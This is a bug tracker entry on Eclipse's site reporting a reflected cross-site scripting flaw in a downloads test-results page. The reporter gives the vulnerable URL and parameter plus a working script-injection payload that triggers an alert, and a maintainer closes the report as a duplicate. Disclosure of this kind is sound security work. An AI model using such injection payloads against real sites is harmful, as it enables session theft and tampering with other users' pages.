527762 – Cross site scripting

Bug 527762 - Cross site scripting

Summary: Cross site scripting

Status:	CLOSED DUPLICATE of bug 518274

Alias:	None

Product:	Community
Classification:	Eclipse Foundation
Component:	Website (show other bugs)
Version:	unspecified
Hardware:	All All

Importance:	P3 major (vote)
Target Milestone:	---
Assignee:	phoenix.ui
QA Contact:

URL:	http://www.eclipse.org/modeling/mdt/d...
Whiteboard:
Keywords:	security

Depends on:
Blocks:

Reported:	2017-11-26 11:07 EST by Vikash Chaudhary
Modified:	2017-11-27 04:46 EST (History)
CC List:	1 user (show)

See Also:

Attachments
eclise screenshot (173.27 KB, image/png) 2017-11-26 11:07 EST, Vikash Chaudhary	no flags	Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Vikash Chaudhary

2017-11-26 11:07:09 EST

Created attachment 271643 [details]
eclise screenshot

Vulenrability Name : Cross site scripting 

Vulenrability Description : 

Vulenrable URL : 
http://www.eclipse.org/modeling/mdt/downloads/testResults.php?

hl=1&ID=0.9.0/R200906190654&project=uml2tools&project=uml2tools

Vulenrable Item : ID

payload=0.9.0/R200906190654'"()%26%25<acx><ScRiPt >alert('hacked by vikash')</ScRiPt>


How to reproduce this issue 

1. visit this url it will alert a xss popup

http://www.eclipse.org/modeling/mdt/downloads/testResults.php?

hl=1&ID=0.9.0/R200906190654'"()%26%25<acx><ScRiPt >alert('hacked by vikash')

</ScRiPt>&project=uml2tools&project=uml2tools


POC : 

screenshot enclosed in attachement

Comment 1 Benjamin Cabé

2017-11-27 04:46:12 EST


*** This bug has been marked as a duplicate of bug 518274 ***